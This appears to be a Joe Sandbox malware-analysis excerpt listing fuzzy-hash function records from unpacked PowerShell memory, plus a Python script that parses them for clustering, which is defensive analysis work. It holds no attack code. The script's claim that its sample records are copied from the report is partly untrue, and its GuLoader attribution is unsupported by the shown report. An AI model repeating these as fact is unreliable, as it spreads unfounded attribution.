                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3865595929
                                                      • Opcode ID: a4e6c3b9c3a8e2bab79c43ffdf0fa6df44f43f11777bfd4f004f91c87bae1325
                                                      • Instruction ID: 5a2cfe080b9d59de315a1dbdef1a90c930d020f74781a5e1b880e18e14bfe4e4
                                                      • Opcode Fuzzy Hash: a4e6c3b9c3a8e2bab79c43ffdf0fa6df44f43f11777bfd4f004f91c87bae1325
                                                      • Instruction Fuzzy Hash: FD5107B1B44209DFCB158F6484787EABBE2AB85710F14C86BD4858F355CB32CD46CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$84l$84l$tP^q$tP^q
                                                      • API String ID: 0-3307220471
                                                      • Opcode ID: ac32389c81d8f5a07557d4f2d9d4ec7736ccd70de52b1e7ade241389919a969e
                                                      • Instruction ID: b1f7e6b6a261debec6b6688f0f07fa3fee36fad605c30b9443256ec1c7fea883
                                                      • Opcode Fuzzy Hash: ac32389c81d8f5a07557d4f2d9d4ec7736ccd70de52b1e7ade241389919a969e
                                                      • Instruction Fuzzy Hash: 85916EB1A00219DFCB148F44C564AEABBF2BF4A710F1A8496EC959B355D731EC82CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3669853574
                                                      • Opcode ID: 5fa263d6a74ee492f786042699cf21fffea378891ddb5aaa7cf9f120edc15bed
                                                      • Instruction ID: 194e304180c3f6dcc81efd4da9df62b98533acc6eca5613afa267d0b59aa9dc3
                                                      • Opcode Fuzzy Hash: 5fa263d6a74ee492f786042699cf21fffea378891ddb5aaa7cf9f120edc15bed
                                                      • Instruction Fuzzy Hash: 2E6105B1F002099FCB289E29C4246EB7BF2AB85611F14C86BD4958F355DB31DC85CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$84l$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1270209019
                                                      • Opcode ID: 7dc8c6d973fd1f13311cedf80a40d0f9c88e90bce2c23f74e97c816a2be4d40e
                                                      • Instruction ID: f2926a45c03d3b7267cef36d75a8348c825a735d12e1a3681e88346c1fc455f1
                                                      • Opcode Fuzzy Hash: 7dc8c6d973fd1f13311cedf80a40d0f9c88e90bce2c23f74e97c816a2be4d40e
                                                      • Instruction Fuzzy Hash: 9561F4B0A1020ADFCB348E54C564BEB77E1AF45311F698457E8A25B3A1C731ED8ACB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$(dq$(dq
                                                      • API String ID: 0-3323838033
                                                      • Opcode ID: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
                                                      • Instruction ID: 988fac4d45b0d10b082bb2f2ecb6b4b02000c8fd56c4e2480934edaccf85df40
                                                      • Opcode Fuzzy Hash: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
                                                      • Instruction Fuzzy Hash: A621F871740119DBCB398E14D9207AB77E2AB84710F25885BED936F384CA319D4AC7A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                      • API String ID: 0-3272787073
                                                      • Opcode ID: ce9993c796720a836cdb82a3dd7b908fbc707ae4a45514c0067a07f0a674b0b2
                                                      • Instruction ID: 9ca7c7dc694834a31969d6115e82ff4e27df63d1359122ca85db3a4910095a1b
                                                      • Opcode Fuzzy Hash: ce9993c796720a836cdb82a3dd7b908fbc707ae4a45514c0067a07f0a674b0b2
                                                      • Instruction Fuzzy Hash: 453106B2B042068FCB294E68C4241E7B7A1ABC5291B26486FD8858B355DF32CC56C753
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q
                                                      • API String ID: 0-1978863864
                                                      • Opcode ID: d5b4633c02421103e7395f27b16bfc8e200a695d9beb314692328d4c644cd69a
                                                      • Instruction ID: 4740de9df6ee1bb947c81d16762a6b4b05e1bea011b36ffe970c910a1d992b3b
                                                      • Opcode Fuzzy Hash: d5b4633c02421103e7395f27b16bfc8e200a695d9beb314692328d4c644cd69a
                                                      • Instruction Fuzzy Hash: 6AF114B1B04315DFCB158F68D824BEBBBA2AB85310F14886BE5958F391DB31DC85CB61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 84l$84l$tP^q$tP^q
                                                      • API String ID: 0-968489892
                                                      • Opcode ID: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
                                                      • Instruction ID: 47b9f06ed53e913153712a659d6b34d3039f1465fcd96180175c1b574800cc8f
                                                      • Opcode Fuzzy Hash: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
                                                      • Instruction Fuzzy Hash: D6914BB1B002069FCB169E798864BBBBBE2AFC5710F14886BD985CF391CA31DD45C761
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$tP^q$(dq$(dq
                                                      • API String ID: 0-152831182
                                                      • Opcode ID: 215f019331bd1270ab7885b60c1c921a1182edf698ffe935a12d3360f29e25d9
                                                      • Instruction ID: ae12b52cd5b4c00f6064bab51410c19dabd636b1c3fcc3c073996f98d69e3692
                                                      • Opcode Fuzzy Hash: 215f019331bd1270ab7885b60c1c921a1182edf698ffe935a12d3360f29e25d9
                                                      • Instruction Fuzzy Hash: 8F2149B0600111EBCB3A8E10D864BEBBBA1AB45710F24444FE9A35B381C6719D4BC791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-2049395529
                                                      • Opcode ID: cc65f9bba7d000f4ee765132426ba15df5dcda6c4c6880a42fc8df1bbf73d663
                                                      • Instruction ID: d0b36822c97416dcaa3419e5d9a3aee131ea118d10f78a7192c8f2c99042b994
                                                      • Opcode Fuzzy Hash: cc65f9bba7d000f4ee765132426ba15df5dcda6c4c6880a42fc8df1bbf73d663
                                                      • Instruction Fuzzy Hash: 5101D4617093956FC32B1A2818305B76FB69FC761071A48DBC080CF357CD998C8A83B2
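The function records above are regular enough to parse mechanically. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it splits the "Memory Dump Source" records into dictionaries, groups the Instruction Fuzzy Hashes by the dump they were lifted from (useful when clustering this sample's unpacked PowerShell code against other reports), and verifies rather than assumes that Opcode ID and Opcode Fuzzy Hash coincide in every record, as they do on this page. The sample input is three records copied from above with the extraction indentation removed. One step is an interpretive assumption of mine, not a statement from the report: the short, repeated String ID tokens such as 4'^q and tP^q are not words, so the helper reads each one as a little-endian 32-bit constant, letting an analyst compare them against module bases before treating them as string indicators.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records (the format shown above)."""
import re
from collections import Counter, defaultdict

# Constructed sample input: three records copied from the report above with the
# indentation removed. The "Strings" heading that precedes a record carrying
# String IDs follows the page layout.
SAMPLE = """\
Memory Dump Source
• Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
• Instruction ID: b14e5daa972cefef16bdfed3bede2a26abd2bf5e4445f03925403c05d2a0b17e
• Opcode Fuzzy Hash: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
• Instruction Fuzzy Hash: 3F11C830D11158DBDF74DB94E5987ECB7B2AF0531AF162429D201B62A0EB745C89CF1A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$(dq$(dq
• API String ID: 0-3323838033
• Opcode ID: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
• Instruction ID: 988fac4d45b0d10b082bb2f2ecb6b4b02000c8fd56c4e2480934edaccf85df40
• Opcode Fuzzy Hash: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
• Instruction Fuzzy Hash: A621F871740119DBCB398E14D9207AB77E2AB84710F25885BED936F384CA319D4AC7A1
Strings
Memory Dump Source
• Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84l$84l$tP^q$tP^q
• API String ID: 0-968489892
• Opcode ID: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
• Instruction ID: 47b9f06ed53e913153712a659d6b34d3039f1465fcd96180175c1b574800cc8f
• Opcode Fuzzy Hash: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
• Instruction Fuzzy Hash: D6914BB1B002069FCB169E798864BBBBBE2AFC5710F14886BD985CF391CA31DD45C761
"""

FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return records


def dump_base(record):
    """Base address (int) of the memory dump the function was lifted from."""
    m = OFFSET_RE.search(record.get("Source File", ""))
    return int(m.group(1), 16) if m else None


def string_tokens(record):
    """Distinct non-empty tokens of the '$'-joined String ID field."""
    return sorted({t for t in record.get("String ID", "").split("$") if t})


def token_as_le_int(token):
    """Assumption, not stated by the report: a short non-word run of printable
    bytes is often a 32-bit immediate whose bytes happen to be printable. Read
    the token as a little-endian integer so it can be compared against module
    bases before it is treated as a string indicator."""
    return int.from_bytes(token.encode("latin-1"), "little")


def summarize(text):
    """Per-dump function counts plus fuzzy hashes usable for clustering."""
    records = parse_records(text)
    per_dump = defaultdict(list)
    for r in records:
        per_dump[dump_base(r)].append(r["Instruction Fuzzy Hash"])
    # On this page Opcode ID equals Opcode Fuzzy Hash in every record; check it.
    opcode_id_is_hash = all(r["Opcode ID"] == r["Opcode Fuzzy Hash"] for r in records)
    return {
        "count": len(records),
        "per_dump": {hex(k): v for k, v in per_dump.items()},
        "opcode_id_is_hash": opcode_id_is_hash,
        "string_tokens": Counter(t for r in records for t in string_tokens(r)),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE)
    print(s["count"], "functions; opcode id == fuzzy hash:", s["opcode_id_is_hash"])
    for base, hashes in s["per_dump"].items():
        print(f"  dump {base}: {len(hashes)} functions")
    for tok in s["string_tokens"]:
        print(f"  token {tok!r:8} -> 0x{token_as_le_int(tok):08X}")
```

Run against the full report text instead of SAMPLE to get one Instruction Fuzzy Hash list per dump; the 074D0000 and 02DF0000 regions are the unpacked code, so those lists are what to compare across other GuLoader submissions. If the decoded constants cluster in one small range, as 4'^q and tP^q do here, they are almost certainly pointers rather than strings and should not be promoted to indicators.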